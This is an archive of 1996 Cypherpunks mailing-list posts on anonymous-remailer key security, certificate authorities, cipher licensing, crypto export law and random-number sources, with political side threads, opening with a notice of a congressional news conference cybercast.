			Zap the Comstock Law Before It
   		   Becomes a Computer Virus on the Internet!

			[Cybercast using CU-SeeMe (tm)]
			
	Representative Patricia Schroeder (D-CO) and Senator Frank R.
Lautenberg (D-NJ) will hold a joint news conference at 10:00 AM EST on
Wednesday, March 6, to discuss the introduction of a bill to strike a
provision of the 1996 Telecommunications Act that criminalizes the
transmission and reception of information about abotion over the Internet.
The conference will be cybercast live from room HC-6 at the U.S. Capitol
in Washington, D.C. Joining Lautenberg and Schroeder will be Kate
Michelman, President of the National Abortion and Reproductive Rights
Action League, and Kathryn Kolbert, Vice President of the Center for
Reproductive Law and Policy. 

	This will be the first Capitol Hill news conference ever to be
transmitted live over the Internet using CU-SeeMe technology! 

	See http://www.house.gov/schroeder/cu-seeme.html for more info.

Time:  	10:00 AM EST Thursday, March 6, 1996
IP:	Main ISP-TV Reflector 205.197.247.33
	Other ISP-TV affiliates see http://www.digex.net/isptv/members.html

To obtain CU-SeeMe software, go to one of these URL's:

	CU-SeeMe for Windows   -- http://goliath.wpine.com/cudownload.htm
	CU-SeeMe for Macintosh -- http://goliath.wpine.com/moredemos.htm

       http://www.digex.net/isptv for more information about ISP-TV




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 6 Mar 1996 09:26:41 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <199603052231.OAA03761@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: mccoy@communities.com (Jim McCoy)
> 
> Hal Finney writes:
> [...]
> > And even then the information is in memory.  An attacker who could
> >gain root privileges (and let's not pretend that the NSA can't do that)
> >can dump memory and later comb it for the key information.
> >
> 
> "Security is economics"  -E. Hughes
> 
> The point is not to make a system which is absolutely, positively, no
> doubt about it, secure against any attacker.  If cypherpunks could do
> this they would be working for defense contractors and others who make
> certified systems.  The objective is to make a system which is difficult
> to attack, one which costs the attacker time/money.  After securing
> a host against the obvious attacks one can turn to the esoteric ones
> such as you present: move the key to kernel memory and remove tools
> for accessing or manipulating that area, run the memory-space encrypted
> and do not let it dump the contents to disk, etc.  Systems which
> have been certified to high Orange book levels already exist, so there
> are obviously solutions to the problems you present.  The tools and
> tricks of these systems just need to be migrated into systems which
> people actually use.

I was speaking of present conditions.  If and when proven-secure Unix
systems start being used as remailer servers on the net then it may be
worthwhile having a larger key.

The point is that there is no advantage in strengthening an element of
the system which is not its weakest link.  Factoring my remailer keys
of 510 bits is not, I am sure, the easiest ways of finding the secret
keys.

> Then remember that remailers gain strength in numbers.  The more
> remailers you chain your message through the better your chances of
> passing through a single node which is not compromised, at which
> point your message has been "mixed."  As long as it is easier for
> someone to create new remailers than to break existing remailers
> we are winning.

It's not clear that this is the case, though, is it?  What is the rate of
creation of new remailers?  It doesn't seem that high to me.  We can't
know how quickly they are being broken, but it is just a matter of
getting root privileges on the remailer machine.  From what I hear of the
capabilities of experienced hacker/cracker types, it is very possible
that remailers are being broken faster than they are being created.  Of
course, there is no way to know.

> >My point remains that strong keys are pointless for remailers which run
> >on Unix systems connected to the net.
> 
> "Insisting on perfect security is for people who do not have the
> balls to live in the real world"  -paraphrased from M. Shaefer
> 
> You give far too much credit to the potential attackers.  One advantage
> that unix systems connected to the net have over your hypothetical
> PC at home is the advantage of persistence, what is the point of
> running a remailer if it is never up, or only up when you need to use
> it?  Traffic analysis of that particular node becomes a pretty easy
> task :)

I meant that the home PC system would have an ongoing connection to the
net, perhaps in the form of periodic uucp or POP connections.  By using
batching, traffic analysis would be no easier for such a system than for
any other.

> The unix hosts running remailers also have the advantage in
> that they have been subjected to attack for quite a while now and
> most of the obvious problems (and some of the non-obvious problems)
> have been fixed.

I am not sure what you mean by this.  My experience is that new CERT
advisories come out every few months which represent security holes big
enough to steal remailer keys.  The most recent one, out just a couple
of weeks ago, is a bug in sendmail and maybe some other programs which
could allow remote users to get root access if they have access to a
DNS server:
ftp://cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers

Even if a remailer host operator is on the ball and fixes each one as
it is announced, he still was vulnerable before the announcement was
made.  In many cases these bugs are found by hackers who exploit them for
bad purposes before the good guys figure out what they are doing.

Suppose a reasonably large prize of several hundred or a few thousand
dollars were offered for someone who could break in and steal the key
of some remailer on a net-connected Unix system.  Wouldn't you agree
that the prize would be claimed before too long?

> A strong key on such a host is better than a weak key, so why not
> make systems as strong as you can?  The only way to have a completely
> secure computer is to encase it in concrete, cut any network connections,
> and drop it into the ocean; OTOH the only thing you have created in this
> case is a fairly unique boat anchor.  You are beginning to sound like
> the people who claim that the NSA can crack any encryption system, not
> because they have any proof but just because they extrapolate their
> limited knowledge into the unknown and mix in a bit of paranoia.

No, my point is that it doesn't really help to strengthen something which
is not the weakest link in the chain.  My rationale for having a short
key is that it more accurately reflects my estimate of the degree of
security provided by my remailer.  Actually probably an even shorter
length than 510 bits would be appropriate, maybe something more like 300
or 400 bits.  Going to a 1000 bit key would probably mislead people into
thinking that they only way an attacker could trace their message would
be by using a zillion mips-years of computing power or something.

> >Recall that my original comments were in connection with the claim that
> >the government was running most of the remailers.  As I said, I still
> >think that is absurd when it would be so much easier to simply steal
> >their keys.
> 
> But the point is that it is _not_ easier to steal the keys.  It is
> much easier to put up a remailer than to attack an existing remailer,
> this is why the remailer system is winning the battle of security
> economics.  By putting up its own remailers a potential attacker
> probabalistically diminishes the number of systems which they must
> break.
> 
> jim

Yes, I think I misstated my point here.  My real point was that large
keys are inappropriate.  Maybe you are right that it is easier to start
up a remailer than to break one.  On the other hand, unless you also break
the ones you don't run, you (as a LEA) are not in a position to
accomplish your presumed goal, which is to track criminal messages to
their source.  So in practice I think they would try to break remailers,
and again I am sure they will not do so by factoring keys, even for
mine.

It's also my personal impression that remailers are not mostly run by
LEA's, just on the basis of the occasional postings I have seen by
remailer operators here.  Frankly I doubt that remailers are enough of a
problem to be worth the effort on the part of a LEA to run one and deal
with all of the hassles.  But this may change in the future.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 6 Mar 1996 09:27:53 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <199603052233.OAA26287@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:08 PM 3/5/96 -0800, Jim McCoy wrote:
>The point is not to make a system which is absolutely, positively, no
>doubt about it, secure against any attacker.  If cypherpunks could do
>this they would be working for defense contractors and others who make
>certified systems.  The objective is to make a system which is difficult
>to attack, one which costs the attacker time/money. ...

It seems to me that one of the best ways to better protect the remailer
system would be to regulary change the remailer keys.  By destroying the
old secret keys, you protect the remailer and its operator against rubber
hose attacks aimed at decrypting recorded traffic.

As a suggestion: Assume you change the keys every week.  You post this
week's key to a public keyserver, replacing last week's key.  To allow
continuous operation you remember both this week's and last week's secret
keys and process messages encrypted under either.  To validate these keys,
you use a long-term key to sign them.  Note that for the really paranoid,
this long-term key can be kept at a separate site, and only used after e.g.
voice verification of the new key's fingerprint.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Wed, 6 Mar 1996 08:03:03 +0800
To: cypherpunks@toad.com
Subject: new netscape servers
Message-ID: <199603052036.OAA04200@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>From the Netscape home page:

"Netscape also announced FastTrack Server 2.0, an entry-level Web server
that combines all the new capabilities of the next-generation Netscape
Servers into one easy-to-use package.  FastTrack comes with SSL security,
Java and JavaScript support, and Netscape Navigator Gold content-creation
software - for only $295."

There are two reactions we can have to this.  On the one hand, it's a 
good thing because it's going to make SSL servers a lot more popular.

But at the same time, it raises some serious questoins about how Netscape 
plans on dealing with competitors.  It's not clear whether or not the 
$295 price tag includes a certificate or not.  But is it coincidental 
that people who want to use alternative technology like apacheSSL will 
have to pay the same price for the cert along as Netscape's customers 
will have to pay for a plug and play package?

(The rest of this post is based on the assumption that you do get a cert 
with the "fast-track" server.  That's not clear, so if I'm wrong, I 
apologize to the folks at Netscape.)

There are two things keeping an organization like c2.org from competitng 
with Netcape on price:  verisign and the licensing fees on rsaref.  Both 
companies have close ties to Netscape.

It's imperative that we challenge Netscape's control over the CAs. 
Obviously they can preinstall whatever CAs they want in their browsers. 

But that doesn't mean we're powerless.  I think we ought to:

(1) form a new non-profit low cost CA

(2) make a concerted effort to explain the issue to the public and
encourage people to ok the new CA.

(3) try to create a sense that using a preinstalled CA is a form a 
collaboration (this will be hard, but I think it's true).  If enough 
people will use a new CA, then it will be as good as one of the 
pre-installed ones.

We can't let this sort of power concentrate in Netscape's hands.  It's 
not a question of whether or not they're good people.  It's just a bad 
development for everyone.

--
Alex Strasheim, alex@proust.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 6 Mar 1996 09:48:25 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Remailer Security
Message-ID: <2.2.32.19960305212904.00683828@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 3/4/96 -0500, jrochkin@cs wrote:
>At 11:06 PM 03/04/96, lmccarth@cs.umass.edu wrote:

>Um, there's no reason why your remailer's account needs to be logged into
>interactively, is there?  Seems like remailer ops should disable login to
>remailer accounts, putting '*' into the password field in /etc/passwd, or
>however unix lets you disable login (I know it does).

If I want a remailer's key, I would probably try to go after root.  Not
only will it get me that key, but there's no telling what else might
turn up in the meantime.  If you can get access to any account on the
system, odds are good you can give yourself root access anyway.  It's
almost a "freebie."

>Obviously, the general security risk of someone gaining unauthorized access
>to the remailer executable or data files is still there, and important to
>keep in mind.  But this would seem to be a fairly logical security measure.

You could always do a custom-compile of PGP that never checks for a passphrase;
it's compiled into the executable.  That's only a trivial measure at best
(heck, hex editors have been around since roughly the dawn of UNIX) but
it's a place to start.

I don't think it's possible to have too much security.

dave

-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net,  dave@nym.alias.net,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Tue, 5 Mar 1996 23:09:51 +0800
To: cypherpunks@toad.com
Subject: Re: Looking for code to run an encrypted mailing list
Message-ID: <2.2.32.19960305144735.0036ffc4@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 23:17 1996-03-04 -0800, John Pettitt wrote:
>The overal intent was to have a message go from one list member to all
>others with a) a signature to provide strong attribution and a measure of
>non repudiation b) low probability of interception c) only the gateway has
>to have all the public keys.  

You could avoid alot of encryption by setting up a key for the list and
giving both keys (secret and public) to all the list members. To write to
the list, you encrypt with the lists public key. Everybody reading the list
can decrypt with the secret key.

Pros: No hacking of majordomo. You can use any mailing list software. The
key and clear text message is never available to a robot, making it harder
to compromise security.

Cons: When somebody is removed from the list you have to change the key,
encrypt the new secret key with everybodys public keys and distribute it.
For a big dynamic list where people unsubscribe daily this could be a major
headache. But for small or static lists it shouldn't be much of a problem.

<matts@pi.se>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Mar 1996 08:48:32 +0800
To: cypherpunks@toad.com
Subject: Mail loop?
Message-ID: <v02120d08ad625defdca5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


It looks to me like the mailing list got subscribed to itself again.

I saw the intro message go by...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Wed, 6 Mar 1996 11:51:21 +0800
To: cypherpunks@toad.com
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <9603052220.AA11028@spirit.aud.alcatel.com>
Message-ID: <v03005302ad621f89a608@[157.22.240.192]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:26 PM 3/5/96, Ted Anderson wrote:
>As James Earl Jones would say: "It's in the Book".

At 6:57 PM 3/5/96, Bill Frantz wrote:
>Try "Applied Cryptography, Second Edition", by Bruce Schneier

At 10:20 PM 3/5/96, Daniel R. Oelke wrote:
>Get Applied Cryptography!!!

To all that keep telling me to use Applied Cryptography -- I have the book
already (an autographed copy ;-)

What I am seeking is more than what is in the book:

  * are there are any links on the web to SEAL?
  * is IBM actively marketing it?
  * what precisely is patent?
  * for how long?
  * has anyone currently licensed it?
  * has anyone tried attacking the algorithm?
  * should we be (the community) be looking at SEAL
    for standards (say as an alternative to RC4?)?
  * is there something better then SEAL available?

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Kucharo <sophi@best.com>
Date: Wed, 6 Mar 1996 12:56:52 +0800
To: cypherpunks@toad.com
Subject: Re: EFF Statement on Leahy/Burns/Murray Crypto Bill
In-Reply-To: <9603052322.AA16005@toad.com>
Message-ID: <313CF3AD.1BC3@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm a little confused by this phrase from the bill. It seems to be
saying just that export needs to be authorized if the software is 
already exportable from the U.S. and if to a financial institution.
 I know that can't be right, but what is the translation of this 
legalese?


> "Requires that export be authorized for non-military encryption
>  software to any country where similar software is exportable from
>  the U.S. to foreign financial institutions."


-- 

-----------------------------------------------------------------
"When they came for the Fourth Amendment I didn't say anything 
because I had nothing to hide.
  When they came for the Second Amendment I didn't say anything 
because I wasn't a gun owner.
  When they came for the Fifth and Sixth Amendments I didn't say 
anything because I had
  committed no crimes. When they came for the First Amendment I 
couldn't say anything."

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEIa2wAAAEEALouE7MNxsG+QTOJSrMTygYWKblpI9MgOKaFA+5AICNelAw6
6Gj3B0EQr7bwLILk8EJULG+kYh/ND9Kn1EXBK+elXbwpFCLqoyEZrbHJnurhH/t6
VFEwhbN1V0e/bFOCTq8nykoJjZ/uq0mz8HouIbEt6BYWoKVSUIU/T+iDV3TVABEB
AAG0DWdoa0Bzb3BoaS5jb20=
=gwax
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 6 Mar 1996 11:54:17 +0800
To: cypherpunks@toad.com
Subject: Square pegs in round holes
Message-ID: <960305200147.20203d67@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


  
  >Bob must find out whether Alice has declared (commited) her interest
  >in him, if and only if he has declared (commited) his interest in her.
  >Before he does so, he can at most know that a girl is interested in him.
  >Another description: Bob and Alice can have a date if they both commit
  >to each other. If only one commits, nobody will ever find out about it.
  
  >- T is the trusted third party.
  
  Well if we *must* use D-H that is a way, but why do that ? Instead of
  using a binary assymetric key, why not a triple ? (Just because I do not
  know of any does not mean that one does not exist).
  
  Consider a function such that Alice has a key such that given a message M,
  when encrypted by Alice may be manipulated by T such that Bob can decrypt
  it. Similarly, Bob has a key that when manipulated by T' can be read by
  Alice. Assymetric but not binary. The advantage here is that while "T"
  is trusted by both, he/she/it/other is not able to read either message, 
  rather acts as a catalyst.
  
  Such a mechanism could be as indicated or could be circular e.q. a cipher 
  such that A can generate a message readable by T who can generate a message 
  redable by B who can generate one readable by A. True you could do this with 
  three pairs of keys distributed alternatively so that a single person can
  only write left and read right.
  
  As to why you would want such a curiosity, consider a corporation with 80,000
  mailboxes. It would be desirable for each person to be able to send E-Mail
  to any other person but not desirable for each person to have to hold all
  80,000 keys.
  
  Given a triple (tertiary ?) function each individual would only need their
  receive key and a "post office" transmit key. On sending a message, it would
  be encrypted with a session key and the session key encrypted with the
  post office key.
  
  The post office would have all 80,000 receive functions but through the 
  assymetic keying would only be able to convert the session key to something
  each intended recipient could decode but not be able to decode the message
  itself.
  
  This would meet both criteria (not key escrow but that is under "management")
  D-H is wonderful but has difficulties with scalability. If such a function
  existed (has anyone looked ?) it would solve the problem.
  							
  "The exercise is left to the student"
  						Warmly,
  							Padgett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Choi (SAR)" <choi@virtu.sar.usf.edu>
Date: Wed, 6 Mar 1996 11:55:51 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Signature
In-Reply-To: <9603052110.AA00640@bilbo.suite.com>
Message-ID: <Pine.SUN.3.91.960305200146.11469A-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


Delurking beginner...
1)	Is it possible to base a privacy key ( e.g. PGP ) on a fractal 
		equation, instead of an algorithm based on two primes?  
		This would allow for an eternal level of complexity due 
		to infinite field of depth one can find as one 'zooms in' 
		closer ( correct me because I'm wrong; I'm not a math major,
		although increasingly I wish I was... ), allowing for near
		unbreakable privacy of information.
2)	It is dead certain that our governments will want at their disposal 
		a decrypt program to crack into data containing information
		possibly related to crimes ( or what not ).  Perhaps access 
		to this program can somehow be leased out like a search warrant
		by a judge, which at least means a check and balance, and any 
		unauthorized use of the program ( perhaps when it cracks into 
		encryptext [ what I call ciphertext, as opposed to uncryptext, 
		or plaintext ;) ] it leaves a very characteristic signature, or 
		cracking into the database that contains the program is near
		impossible; maybe it's not physically connected to the 
		Internet until the warrant is granted ) results in punishment,
		of course.
Back to lurking...
	 
							Sincerely.
							Quentin Holte.
							( aka Charles Choi. ) 
							
							You are all the Buddha.
								- Last words
								  of Buddha.

							If you see the Buddha,
                                            		             kill him.
                                                                - Zen proverb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Choi (SAR)" <choi@virtu.sar.usf.edu>
Date: Wed, 6 Mar 1996 11:59:30 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Signature 2
In-Reply-To: <9603052110.AA00640@bilbo.suite.com>
Message-ID: <Pine.SUN.3.91.960305202130.11469B-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


Decloaking...
Assumption 1 : a privacy key can become uncrackable.
Assumption 2 : an individual signature can become immune to fraud.
Posit : fuse the two together so that pseudonyms/aliases/online names ensure 
		complete privacy, but ensure that you talk to the same person
		everytime.  
Probably proposed already.
Cloaking...

							Sincerely.
							Quentin Holte.
							( aka Charles Choi. ) 
							
							You are all the Buddha.
								- Last words
								  of Buddha.

							If you see the Buddha,
                                            		             kill him.
                                                                - Zen proverb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Wed, 6 Mar 1996 12:51:03 +0800
To: cypherpunks@toad.com
Subject: Re: FW: Communications Decency Act (hee-hee)
Message-ID: <9603060237.AB20153@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


tcmay wrote:

>Welcome to the Fourth Reich.

Read _The_Ominous_Parallels_ by Leonard Peikoff

JFA
**** OLD KEY: USE ONLY FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 
Jean-Francois Avon <jf_avon@citenet.net>
84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Mar 1996 15:24:35 +0800
To: cypherpunks@toad.com
Subject: key security for anon remailers
Message-ID: <199603060542.VAA28908@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We've been discussing the security problems with leaving your PGP key
around on anonymous remailers.  Mixmaster and the ghio2 remailers
have the key compiled in, but at least for ghio2 the string is sitting
there unencrypted and unmasked in the binary, where somebody who
can access the binary can run "strings" to steal it, without even the
bother of decompiling :-)  The primary alternative is to start up
the remailer with the PGP passphrase in its environment, but doing that
has its problems - the ghio2 remailer is made to run as a batch process
called for each message, rather than a permanent listener, and if
you did something like put the key into the sendmail daemon's environment,
it'd probably be even easier to steal (e.g. anybody on the machine
could do it by setting up their own mail-processor.)

A minor hack that I do with my remailer is to keep two versions
of the source - a vanilla one for distribution, and one with
all my customized information that I actually compile and run.

So how can you keep a persistent process that isn't part of the
mail empire?  One approach is to have a remailer daemon using sockets or
named pipes that does the decryption and feeds mail to a remailer
process (which _it_ calls) for delivery or has its own builtin remailing -
you'd input the key to the daemon when you start it up, and
wouldn't need to leave it in a file or environment, just in
the executing process itself.  Probably an hour's hack using PGP3.0,
or you can grind up the current I/O routines for PGP 2.6.2 and
ignore the fact that you void your RSAREF license that way.
You'd have to get rid of some of the code that overwrites the passphrase
and other sensitive data, though.

Another approach is to have a separate box that's not on the
network that the remailer runs on (obviously this is easier
on a machine you've got at home or work rather than at an ISP...)
You can take that old 8086 or 386, run a daemon to accept files
on the serial port and return them to the mail system on the serial port.
Uucp is probably secure enough.  (Does PGP run on Minix,
or on any of the old Xenix or Venix operating systems?
It's probably easier to build workable communications daemons
on one of them than on DOS, though there are DOS uucp and
kermits that you could hack up.  For a 386, Linux is the obvious choice.)
Since the entire remailer would be running on the box,
and you don't permit logins from the serial port,
it's probably pretty secure, even against someone with root
on the network-connected machine, assuming all your traffic is encrypted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 6 Mar 1996 10:01:52 +0800
To: cypherpunks@toad.com
Subject: Re: Bombings, Surveillance, and Free Societies
Message-ID: <199603052148.WAA05491@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



At 12:51 PM 3/4/96, Timothy C. May wrote:

> Personally, while I feel sorry for the dead in Israel, I think anyone who
> moves to a small desert state surrounded on all sides by Arabs who want
> their land back is asking for trouble.

I argue that the invading of countries, bombing of cities,
starving of towns, burning of villages, hijacking of ships,
and murdering torturing, beating and kidnapping of Arabs to be
"asking for trouble."

> Being an atheist, I treat all religious mystics as suspect. When a bunch of
> people leave London and Chicago and Paris to live in the desert, surrounded
> by sworn enemies with nuclear capabilities, I think whatever happens to
> them is...."unsurprising."

I disagree with you here; the only side with nuclear capabilities is
Israel.



	We cannot keep having this mixture of Jews and Arabs.
	We have to stop the blurring. There has to be a separation, not
	just a technical closure. We have to decide on separation as
	a philosophy." - Yitzhak Rabin








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 6 Mar 1996 13:28:13 +0800
To: cypherpunks@toad.com
Subject: TER_ror
Message-ID: <199603060351.WAA12445@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   EcoMist, March 2, 1996: 
 
   "What is terrorism? The use of terror is more widespread 
   and effective than is generally recognised." 
 
      A special essay that weighs military action, guerrilla 
      warfare and terrorism. 
 
 
   TER_ror 
 
   ----- 
 
   This issue also presents "in the mind of the terrorist," "a 
   new plan for Ulster" and "Israel, Palestine and Hamas." 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Wed, 6 Mar 1996 15:51:54 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <v01510108ad62d6dcbc14@[206.196.98.94]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>Tim Fulbright wrote:
>>
>> Now I, a lurker for two months, am truelly confused!  L. Deitweiler must be
>> right.   Surely one of you cyperpunk fellows could hack together a
>>dongle with
>> some kind of AD converter and buffer ram to gather a Truelly Random Bitstream
>> off the environment every couple of milliseconds easier than this raindrop
>> scheme or recording the fan, you're haviung me on!.  Let's go back [..]
>
>The raindrop scheme was (politely) laughed off.  As for the fan recording
>scheme, it's a good make-do-with-what-you-already-have method, as opposed
>to buying and/or building a card.
>
>A 'simple AD converter' isn't so simple.  Especially if you want to be
>sure you really have random noise and not something else that just looks
>random.
>- ---
>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMTz0nSoZzwIn1bdtAQGl6QF+P1V62qg+Mf5K+VN3q0Y1e6/A4EO4uLLr
>WNxAbtE+OxQXFKnP7ajFUFBbnDLJxLmx
>=4ysY
>-----END PGP SIGNATURE-----

Actually, I remember reading somewhere,  a long time ago though, that the
NSA had come up with an almost undoubtably random sequence by using random
high altitude RF signals, scanning a certain frequency I guess. Then using
it as the random number.
Given the amount of RF transmisions world-wide and the addition of
high-altitude interference, it should be completely random. Unless someone
were to get their hands on you copy of it or happened to be hooked up to
your reciever at the time of recording, there is no way they could figure
it out.

--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

++++++++++++
**************************************
*	 Matthew Murphy	------------ eggplant@inlink.com
*   ----------
*   http://www.inlink.com/~eggplant
*   The Web page is under construciton at this time though..
*   Please don't mind the mess....	
*									   		   																													     	
**************************************
++++++++++++
finger eggplant@inlink.com for my PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Wed, 6 Mar 1996 15:52:13 +0800
To: cypherpunks@toad.com
Subject: St. Louis Cypherpunks
Message-ID: <v01510101ad62dc1e66b1@[206.196.98.101]>
MIME-Version: 1.0
Content-Type: text/plain


I'm lookig for people who live in the St. Louis area who are interested in
computers in general and the internet specificly. If you could drop me a
line, I would be most appreciative.
Thnx in advance....


--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

++++++++++++
**************************************
*	 Matthew Murphy	------------ eggplant@inlink.com
*   ----------
*   http://www.inlink.com/~eggplant
*   The Web page is under construciton at this time though..
*   Please don't mind the mess....	
*									   		   																													     	
**************************************
++++++++++++
finger eggplant@inlink.com for my PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Mar 1996 16:25:44 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Bombings, Surveillance, and Free Societies
Message-ID: <ad6277461b021004b977@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:42 AM 3/6/96, Bill Stewart wrote:
>At 07:41 PM 3/4/96 -0800, Tim wrote:
>
>>Let me use the language Bill Stewart used a while back, language which
>>skirts the issue of "right" and "wrong" even more neatly than I did (when I
>>said the Jews were "asking for trouble"):
>>
>>"If a religious group uses force to expel the current occupants of a desert
>>region, and expels them to just beyond their borders, it is "unsurprising"
>>that those expelled, and their children, and their children's children,
>>will swear a blood oath to drive the group into the sea."
>
>That wasn't me, though I've said similar things about terrorism against
>governments - those that go out of their way to attack and harass people
>shouldn't be surprised when people attack them in return.

I'm pretty sure it was you. As I don't want to search through past posts to
try to find your use of this, let me make it clear that the language I was
referring to was what I quoted: "unsurprising."

I think you pointed out that instead of talking about "right" and "wrong,"
charged as they are, one can instead talk about certain events being
"unsurprising."

If this was not your coinage, and no one else steps forward, then I'll
gladly steal it and file the serial number off.

--Tim May, a felon


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 6 Mar 1996 14:52:43 +0800
To: cypherpunks@toad.com (toad.com)
Subject: Re: Jump Start ecash With IPhone
In-Reply-To: <telecom16.98.4@massis.lcs.mit.edu>
Message-ID: <0lDG84_00YUsAt0jgB@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


When thinking about ecash-supported net.telephony, consider the attached
message.

-Declan

---------- Forwarded message begins here ----------

Message-ID: <wlDDHkW00YUvAyuyMw@andrew.cmu.edu>
Date: Tue,  5 Mar 1996 21:14:08 -0500 (EST)
From: "Declan B. McCullagh" <declan+@CMU.EDU>
X-Andrew-Message-Size:    3344+0
To: Fight Censorship Mailing List <fight-censorship+@andrew.cmu.edu>
Subject: Long distance companies demand FCC net-regulation

